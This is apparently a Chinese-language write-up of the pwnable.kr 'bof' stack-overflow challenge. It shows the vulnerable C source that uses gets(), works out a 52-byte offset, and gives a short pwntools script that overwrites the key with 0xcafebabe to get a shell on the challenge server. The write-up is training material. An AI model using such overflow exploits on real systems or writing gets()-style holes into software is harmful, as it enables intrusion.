pwnable.kr中的bof也可以算是学习栈溢出的"hello world"
题目给出了程序下载地址和c的代码,并且给了程序的一个监听口,通过该端口即可连接到题目的环境
先分析一下C的代码
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
看到主函数和自定义的func函数,main函数直接调用了func函数,传入了参数0xdeadbeef,主函数汇编之后为
跟入到func函数里看一下,先会通过gets得到overflowme的值,然后进行判断key == 0xcafebabe,如果条件正确则可得到shell
观察汇编代码也可以看到cmp比较指令和jne条件跳转指令,
我们只要让输入的值将key的值覆盖掉,满足条件即可get shell
那么就要知道key的位置和输入的位置
输入的位置在[ebp-2Ch],key的位置在[ebp+8h],+0x00000008 - (-0x0000002C) = 0x34 = 52,两者地址的距离为52个字节,因此使用52个‘A’覆盖之后再加上4字节的0xcafebabe,就可以了(注:ebp+8h刚好是第一个参数,可以看下面这幅图)
# -*- coding:utf-8 -*-
import pwn
r = pwn.remote('pwnable.kr',9000)
r.send('a'*52+pwn.p32(0xcafebabe))
r.interactive()
可以先了解基础和函数调用约定,参考文章